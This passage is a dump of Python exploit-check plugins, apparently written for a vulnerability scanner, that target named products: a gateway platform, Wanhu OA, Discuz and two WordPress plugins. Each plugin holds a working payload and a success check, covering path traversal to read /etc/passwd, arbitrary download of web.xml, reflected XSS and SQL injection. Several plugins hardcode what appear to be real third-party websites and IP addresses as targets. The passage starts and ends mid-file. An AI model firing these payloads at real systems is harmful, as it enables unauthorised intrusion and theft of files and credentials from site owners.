| if __name__=="__main__": 20 | from dummy import * 21 | audit(assign('www', 'http://manticore.2y.net/cgi-bin/dlwct.sh')[1]) 22 | -------------------------------------------------------------------------------- /exp_list/exp-1393.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import re 4 | 5 | def assign(service, arg): 6 | if service == "xr_gatewayplatform": 7 | return True, arg 8 | 9 | def audit(arg): 10 | payloads = ['msa/../../../../../../../../etc/passwd', '/msa/main.xp?Fun=msaDataCenetrDownLoadMore+delflag=1+downLoadFileName=test.txt+downLoadFile=../etc/passwd'] 11 | for payload in payloads: 12 | url = arg + payload 13 | code, head, res, errcode, _ = curl.curl(url) 14 | if code == 200 and 'root' in res and '/bin/bash' in res: 15 | security_warning(url) 16 | 17 | if __name__ == '__main__': 18 | from dummy import * 19 | audit(assign('xr_gatewayplatform', 'http://112.16.141.6/')[1]) -------------------------------------------------------------------------------- /exp_list/exp-1406.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #-*- coding:utf-8 -*- 3 | #__Author__= Sevsea 4 | #_PlugName= 万户download_old.jsp任意文件下载 5 | #_FileName_= wanhu_download_old.py 6 | def assign(service,arg): 7 | if service == "whezeip": 8 | return True,arg 9 | 10 | def audit(arg): 11 | payload='defaultroot/download_old.jsp?path=..&name=x&FileName=WEB-INF/web.xml' 12 | url=arg+payload 13 | code,head,body,errcode,fina_url=curl.curl(url) 14 | if code ==200 and '' in body: 15 | security_warning(url) 16 | 17 | if __name__ == '__main__': 18 | from dummy import * 19 | audit(assign('whezeip','http://oa.zjcof.com.cn/')[1]) -------------------------------------------------------------------------------- /exp_list/exp-141.py: -------------------------------------------------------------------------------- 1 | #Referer:http://www.wooyun.org/bugs/wooyun-2014-084097 2 | def assign(service, arg): 3 | if service == "discuz": 4 | return True, arg 5 | 6 | def audit(args): 7 | payload = "/admincp.php?infloat=yes&handlekey=123);alert(/testvul/);//" 8 | verify_url = args + payload 9 | code, head, content, errcode,finalurl = curl.curl(verify_url) 10 | if code==200 and "if($('return_123);alert(/testvul/);//'" in content: 11 | security_info(verify_url) 12 | 13 | if __name__ == '__main__': 14 | from dummy import * 15 | audit(assign('discuz', 'http://www.misssky.cn/')[1]) 16 | -------------------------------------------------------------------------------- /exp_list/exp-1417.py: -------------------------------------------------------------------------------- 1 | # !/usr/bin/dev python 2 | # -*- coding:utf-8 -*- 3 | #__Author__ = buliuchang 4 | # __refer__ = https://www.exploit-db.com/exploits/37244/ 5 | 6 | def assign(service, arg): 7 | if service == "wordpress": 8 | return True, arg 9 | 10 | def audit(arg): 11 | payload='wp-content/plugins/wp-symposium/get_album_item.php?size=md5(1);--' 12 | target=arg+payload 13 | code, head, res, ecode, redirect_url =curl.curl(target) 14 | if code == 200 and 'c4ca4238a0b923820dcc509a6f75849b' in res: 15 | security_hole(target) 16 | 17 | if __name__ == '__main__': 18 | from dummy import * 19 | audit(assign('wordpress', 'http://localhost/wordpress/')[1]) 20 | -------------------------------------------------------------------------------- /exp_list/exp-142.py: -------------------------------------------------------------------------------- 1 | #Referer: http://www.securityfocus.com/archive/1/534437 2 | def assign(service, arg): 3 | if service == "wordpress": 4 | return True, arg 5 | 6 | def audit(args): 7 | payload = 'wp-admin/admin.php?page=pods&action=edit&id=4%22>